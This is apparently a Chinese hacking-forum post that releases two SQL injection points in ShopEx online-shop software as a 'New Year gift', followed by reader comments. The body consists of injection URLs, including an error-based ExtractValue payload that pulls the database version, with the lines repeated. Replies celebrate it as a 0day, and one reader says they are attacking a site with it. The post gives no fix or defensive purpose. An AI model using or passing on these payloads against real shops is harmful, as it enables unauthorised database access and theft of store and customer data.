T00ls新年礼物之二:shopex通杀SQL注入两处
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
关于作者
评论90次
这个确实蛮给力,学了不少
膜拜膜拜一下
good! cool
各种ODAY给力
又见oday
给力啊,收了。。。。。。。。。
好东西,支持一下,前段时间有兴趣搞一个shopexp的站
这牛X啊
支持 顶一个。。。不过怎么看连接都像是一个呢?
应该要被封了,转出去了
过年了压在手里的东西都放出来吧。
过年了 0DAY也比较多了 顶
嗯 了 正弄了个站!
楼组V5。。。。
感谢。
测试下
给力啊啊!!!
话说这个礼物给力啊!!
还是喜欢0day那